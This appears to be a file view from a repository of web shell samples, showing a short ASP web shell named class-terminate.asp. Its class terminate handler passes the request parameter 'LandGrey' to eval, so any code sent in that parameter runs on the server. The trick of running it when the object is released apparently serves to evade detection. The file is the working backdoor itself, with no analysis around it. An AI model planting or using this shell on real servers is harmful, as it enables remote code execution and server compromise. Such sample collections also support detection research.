webshell/asp/class-terminate.asp

10 lines
148 B
Text
Raw Normal View History

<%
Class LandGrey
Private Sub class_terminate
eval (request("LandGrey"))
End Sub
End Class
Set X = New LandGrey
Set X = Nothing
%>